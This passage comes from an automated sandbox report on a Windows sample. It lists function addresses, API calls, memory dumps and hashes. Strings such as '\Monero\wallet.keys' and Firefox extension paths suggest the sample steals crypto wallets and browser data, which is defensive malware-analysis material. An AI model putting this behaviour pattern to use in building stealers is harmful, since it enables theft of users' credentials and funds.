                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 7074fe4805e5082a6138325aa0dfaf1c4fcdfbc45283c9bb49cba509c0c70e6d
                                  • Instruction ID: 5a6e936bb0f1931c006df9aec7b56fd311297a0b8e94b91f5778c4fa9f53ca6a
                                  • Opcode Fuzzy Hash: 7074fe4805e5082a6138325aa0dfaf1c4fcdfbc45283c9bb49cba509c0c70e6d
                                  • Instruction Fuzzy Hash: 5201E9B5500108FFDB04DFE8C985EAE7BB9FB84395F108558F9098B210C675AA40DBD5
                                  Function 005312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005312B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 005312BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005312D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005312F5
                                  • RegCloseKey.ADVAPI32(?), ref: 005312FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 5306583e4a160311b3a52e8acb6a64f4380fa2acdfbd676b5fc7a5c5f2289a60
                                  • Instruction ID: 5867eedf550a2f93bac63b5d75a7064ccec8214ac3c9c7d2cf3386e4e56968d0
                                  • Opcode Fuzzy Hash: 5306583e4a160311b3a52e8acb6a64f4380fa2acdfbd676b5fc7a5c5f2289a60
                                  • Instruction Fuzzy Hash: FA01E6B9A40308BBDB04DFE4DC49FAEB7B8EB88741F108155FA0997280D6759A418F95
                                  Function 00546630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00546663
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00546726
                                  • ExitProcess.KERNEL32 ref: 00546755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: f7109a649076d8b3a40c0b18bc691de1131f751e5380c043201a31971c1e7fbd
                                  • Instruction ID: 6f9bbdcc66ac9ec838afbef635ef48f15d52b00b665bb9cd8eefe6cd889e45bc
                                  • Opcode Fuzzy Hash: f7109a649076d8b3a40c0b18bc691de1131f751e5380c043201a31971c1e7fbd
                                  • Instruction Fuzzy Hash: AD3150B1C01208ABEB54EB60DC89FDD7B78BF84304F404188F21966191DF746B88CF5A
                                  Function 005487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00550E28,00000000,?), ref: 0054882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00548836
                                  • wsprintfA.USER32 ref: 00548850
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 70186e4005905007de2079a1ae409624ef83f6aac4d813725775f1c0a09b51e4
                                  • Instruction ID: 63d58ad8e3e7017236feff9c9599ba0f8090e3bdbd242a73e7070b9072953833
                                  • Opcode Fuzzy Hash: 70186e4005905007de2079a1ae409624ef83f6aac4d813725775f1c0a09b51e4
                                  • Instruction Fuzzy Hash: AB2133B1E40204BFEB04DF94DD45FAEBBB8FB48751F108559F509A7280C7799940CBA6
                                  Function 00548D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0054951E,00000000), ref: 00548D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00548D62
                                  • wsprintfW.USER32 ref: 00548D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 69e2d27b47531925d22cdce8ac868c0af3a3e3177bb3ed220cf00ffc6dd1cdde
                                  • Instruction ID: a2ee97e5ca591e030b1b7089ddfb0389a79adc2fbcb610e338846d5bf6c6e2f6
                                  • Opcode Fuzzy Hash: 69e2d27b47531925d22cdce8ac868c0af3a3e3177bb3ed220cf00ffc6dd1cdde
                                  • Instruction Fuzzy Hash: 6FE08671A40308BBD700DB94DC09E5D77BCEB44742F044094FD0D87280D9755E408B96
                                  Function 0053A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0053A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 0053A6BC
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 442d31f3c7624091f248b30b41e28e272923c1c383449785b0c4b328dfd2ee22
                                  • Instruction ID: e9e0ef5c6221cd43536ec073f5bd67a99c6a0028e1812dc35dd7fad27183237d
                                  • Opcode Fuzzy Hash: 442d31f3c7624091f248b30b41e28e272923c1c383449785b0c4b328dfd2ee22
                                  • Instruction Fuzzy Hash: 99E12272850109ABEB44FBA4DC9AEEE7738FF94308F508159F41672091EF346A4DCB66
                                  Function 0053D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053D481
                                  • lstrlen.KERNEL32(00000000), ref: 0053D698
                                  • lstrlen.KERNEL32(00000000), ref: 0053D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: aac8349fa4f119dfc00ad7a403de28d1cb06081be752b64bcf09d162bef977cc
                                  • Instruction ID: a2bec4f01ceec56d37aea9b4c141a366be3b5a4bbd51d8ede18d9e7a567bd3f2
                                  • Opcode Fuzzy Hash: aac8349fa4f119dfc00ad7a403de28d1cb06081be752b64bcf09d162bef977cc
                                  • Instruction Fuzzy Hash: E2913772850105ABEB44FBA0DC9ADEE7B38FF94308F504169F507B2091EF346A49CB66
                                  Function 0053D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053D801
                                  • lstrlen.KERNEL32(00000000), ref: 0053D99F
                                  • lstrlen.KERNEL32(00000000), ref: 0053D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 00f1d2e19dff670bdc6c08ca954f05c9078397014215fb855681c6aee87f6706
                                  • Instruction ID: 54fca73dd20880e23da5d41f6670283aa70a7c49e2d99d3c6ad9da6ca4d13c2d
                                  • Opcode Fuzzy Hash: 00f1d2e19dff670bdc6c08ca954f05c9078397014215fb855681c6aee87f6706
                                  • Instruction Fuzzy Hash: 3F813672850105ABEB44FBB0DC5AEEE7B38FF94308F514519F407A6091EF346A49CB66
                                  Function 0053F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00551580,00550D92), ref: 0053F54C
                                  • lstrlen.KERNEL32(00000000), ref: 0053F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 75673bc10c5142e1310042dc97aa2b0e772ff7aa0ee95d6955bbfac6857881b0
                                  • Instruction ID: 6cc95c82befa7bbaca2d568f23373a232e7f5afeeda048950c889eb85bc4d1a0
                                  • Opcode Fuzzy Hash: 75673bc10c5142e1310042dc97aa2b0e772ff7aa0ee95d6955bbfac6857881b0
                                  • Instruction Fuzzy Hash: 83511471D50109AAEB54FBB0DC5ADED7B38FFD4308F408528F81667191EE346A09CBA2
                                  Function 00543560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
